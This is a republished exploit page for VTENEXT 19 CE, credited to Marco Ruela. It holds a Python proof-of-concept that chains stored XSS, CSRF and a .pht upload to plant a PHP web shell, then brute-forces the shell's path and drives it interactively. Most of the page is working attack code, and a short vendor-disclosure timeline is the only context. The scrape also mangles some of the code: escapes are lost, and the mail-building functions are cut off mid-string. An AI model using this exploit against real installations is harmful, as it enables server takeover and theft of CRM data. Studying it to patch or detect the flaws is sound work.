Exploit/Advisories

Published on September 11th, 2020 📆 | 7694 Views ⚑

0

VTENEXT 19 CE – Remote Code Execution


iSpeech.org
[*]

[*]#!/usr/bin/python3

# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE : N/A

# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure

# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.

# XSS - The "From" field of the VTENEXT Messages module is vulnerable.
# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default .
# CSRF - No CSRF protections in place.

# exploit.js needs to be hosted somewhere, IP's need to be replaced
# check_csrf() should be changed based on your setup
# run_shell() is a "nice to have"

# content of exploit.js
"""
function insertImage() {
var xhr = new XMLHttpRequest();
xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
xhr.setRequestHeader('Content-Length', '248');
xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
xhr.withCredentials = true;
var body = '-----------------------------rektnContent-Disposition: form-data; name="file_0"; filename="shell.pht"nContent-Type: text/textnn< ?php system($_GET['x']); ?>nn-----------------------------rekt--';

var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } insertImage(); """ import smtplib import datetime import requests import os import time base_url = "http://192.168.226.168/vtenext19ce/" print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC") def build_url(): d = datetime.datetime.today() year = str(d.year) month = str(d.strftime("%B")) week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1]) tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/" return(tmp) def build_mail(): _from = """'

def check_csrf():
while True:
is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()

if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
print("[>] CSRF triggered")
break
else:
time.sleep(0.5)
continue

def find_shell():
print("[>] Locating shell")
time.sleep(1)
tmp1 = build_url()
for i in range(1, 9999):
url = tmp1 + str(i) + "_shell.pht"
r = requests.get(url)
if r.status_code == 200:
print("[>] Found the shell")
print("[-] Location: " + url)
return url
else:
continue

def run_shell(x):
print("n")
while True:
cmd = input("shell> ")
if cmd == "exit":
break
else:
url = x + "?x=" + cmd
r = requests.get(url)
print(r.text)

print("[>] Sending email")
send_mail()

print("[-] Waiting for user to open mail")

check_csrf()

shell_location = find_shell()

run_shell(shell_location)

print("[!] Done!")

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑